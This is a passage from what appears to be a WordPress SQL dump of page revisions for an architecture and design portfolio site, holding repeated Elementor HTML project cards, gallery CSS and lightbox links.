</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMS5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMi5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMy5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-05-30 08:55:45','2023-05-30 08:55:45','',4681,'https://bauhaus.futuremediatrix.com/?p=4831',0,'revision','',0),(4832,2,'2023-05-30 08:55:45','2023-05-30 08:55:45','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMS5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMi5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMy5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-05-30 08:55:45','2023-05-30 08:55:45','',4681,'https://bauhaus.futuremediatrix.com/?p=4832',0,'revision','',0),(4833,2,'2023-05-30 08:55:46','2023-05-30 08:55:46','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 